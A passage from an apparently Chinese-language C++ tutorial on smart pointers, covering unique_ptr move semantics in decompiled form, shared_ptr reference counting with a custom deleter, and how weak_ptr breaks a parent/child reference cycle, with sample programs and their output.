v24 = (void *)operator new(0x20uLL);
std::string::basic_string<std::allocator<char>>(v24, "22222222", v27);
std::unique_ptr<std::string>::unique_ptr<std::default_delete<std::string>,void>(v26, v24); /* unique_ptr的构造函数 */
std::allocator<char>::~allocator(v27);

......

v10 = std::move<std::unique_ptr<std::string> &>(v26); /* 把左值转成右值 */
std::unique_ptr<std::string>::unique_ptr(v27, v10); /* unique_ptr的构造函数 */
v11 = std::move<std::unique_ptr<std::string> &>(v25); /* 把左值转成右值 */
std::unique_ptr<std::string>::operator=(v26, v11);

......

std::unique_ptr<std::string>::~unique_ptr(v27);
std::unique_ptr<std::string>::~unique_ptr(v26);
std::unique_ptr<std::string>::~unique_ptr(v25)

shared_ptr

shared_ptr 基于非排他所有权模式:允许多个指针指向同一个资源

  • 当复制或拷贝时,引用计数加 “1”
  • 当智能指针析构时,引用计数减 “1”
  • 如果计数为 “0”,代表已经没有指针指向这块内存,那么就释放它
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#include <iostream>
#include <memory>
using namespace std;

/*
 * Custom deleter passed to shared_ptr<string>.
 * Prints the string, then releases it: once a deleter is supplied, the
 * shared_ptr relies on it to free the object.
 * A null pointer is ignored, since the deleter is also invoked for a
 * shared_ptr that was constructed from a null pointer.
 */
void deleteStr(string* p) {
    if (p == nullptr) {
        return;
    }
    cout << *p << endl;
    delete p;
}

/*
 * Demo: three shared_ptr handles share one string; the use counts are
 * printed before and after two of the handles are reset, and the custom
 * deleter runs when the last handle is reset.
 */
int main(){
    string* str = new string("11111111");
    std::shared_ptr<string> p1(str, deleteStr); /* deleteStr is the custom deleter */
    std::shared_ptr<string> p2(p1);
    std::shared_ptr<string> p3(p2);

    cout << "p1 count = " << p1.use_count() << endl;
    cout << "p2 count = " << p2.use_count() << endl;
    cout << "p3 count = " << p3.use_count() << endl;

    /* Use nullptr rather than the NULL macro: its conversion to an empty shared_ptr is well defined. */
    p1 = nullptr;
    p2 = nullptr;

    cout << "p1 count = " << p1.use_count() << endl;
    cout << "p2 count = " << p2.use_count() << endl;
    cout << "p3 count = " << p3.use_count() << endl;

    p3 = nullptr; /* last owner released: the deleter is invoked here */
    cout << "22222222" << endl;

    return 0;
}
1
2
3
4
5
6
7
8
p1 count = 3
p2 count = 3
p3 count = 3
p1 count = 0 /* p1被置空 */
p2 count = 0 /* p2被置空 */
p3 count = 1 /* shared_ptr的计数器为"1" */
11111111 /* 当shared_ptr的计数器为"0"时,调用析构函数 */
22222222

weak_ptr

weak_ptr 是为配合 shared_ptr 而引入的一种智能指针,它只可以从一个 shared_ptr 或另一个 weak_ptr 对象构造

weak_ptr 提供的是一个弱引用:

  • 弱引用不更改引用计数,类似普通指针

shared_ptr 提供的是一个强引用:

  • 当对象被创建时,计数为 “1”,每创建一个变量引用该对象时,该对象的计数就增加“1”,当上述变量销毁时,对象的计数减 “1”,当计数为 “0” 时,这个对象也就被析构了
  • 强引用计数在很多种情况下都是可以正常工作的,但是也有不奏效的时候,当出现循环引用时,就会出现严重的问题
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#include <iostream>
#include <memory>
using namespace std;

/* Forward declarations so that each class can name the other before it is defined. */
class parent;
class children;
/* Reference-counted owning handles. */
typedef shared_ptr<parent> parent_ptr;
typedef shared_ptr<children> children_ptr;
/* Weak handle to a parent; declared here but not used by this version of the example. */
typedef weak_ptr<parent> parent_ptr2;

/* Holds a shared_ptr to its child and logs a message when it is destroyed. */
class parent {
public:
    children_ptr children;

    ~parent() {
        std::cout << "destroying parent\n";
    }
};

/* Holds a shared_ptr back to its parent and logs a message when it is destroyed. */
class children {
public:
    parent_ptr parent;

    ~children() {
        std::cout << "destroying children\n";
    }
};

/* Creates a parent and a child, points each at the other, then prints both use counts. */
void test() {
    parent_ptr father(new parent());
    children_ptr son(new children());

    father->children = son;
    son->parent = father;

    const long father_refs = father.use_count();
    const long son_refs = son.use_count();
    std::cout << "father count = " << father_refs << std::endl;
    std::cout << "son count = " << son_refs << std::endl;
}

/* Entry point: brackets the call to test() with begin/end markers. */
int main() {
    std::cout << "begin test\n";
    test();
    std::cout << "end test\n";
    return 0;
}
  • 由于 parent 和 children 对象互相引用,它们的引用计数都是 “2”,不能自动释放
  • 并且此时这两个对象再无法访问到
1
2
3
4
begin test
father count = 2
son count = 2
end test

使用弱引用 weak_ptr 即可打破循环:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#include <iostream>
#include <memory>
using namespace std;

/* Forward declarations so that each class can name the other before it is defined. */
class parent;
class children;
/* Reference-counted owning handles. */
typedef shared_ptr<parent> parent_ptr;
typedef shared_ptr<children> children_ptr;
/* Weak handle to a parent; used as the type of children::parent below. */
typedef weak_ptr<parent> parent_ptr2;

/* Holds a shared_ptr to its child and logs a message when it is destroyed. */
class parent {
public:
    children_ptr children;

    ~parent() {
        std::cout << "destroying parent\n";
    }
};

/* Refers back to its parent through a weak_ptr and logs a message when it is destroyed. */
class children {
public:
    parent_ptr2 parent;

    ~children() {
        std::cout << "destroying children\n";
    }
};

/* Creates a parent and a child, points each at the other, then prints both use counts. */
void test() {
    parent_ptr father(new parent());
    children_ptr son(new children());

    father->children = son;
    son->parent = father; /* children::parent is a weak_ptr in this version */

    const long father_refs = father.use_count();
    const long son_refs = son.use_count();
    std::cout << "father count = " << father_refs << std::endl;
    std::cout << "son count = " << son_refs << std::endl;
}

/* Entry point: brackets the call to test() with begin/end markers. */
int main() {
    std::cout << "begin test\n";
    test();
    std::cout << "end test\n";
    return 0;
}
1
2
3
4
5
6
begin test
father count = 1 /* 由于children使用弱指针,因此children并不会使father的计数器增加 */
son count = 2
destroying parent
destroying children
end test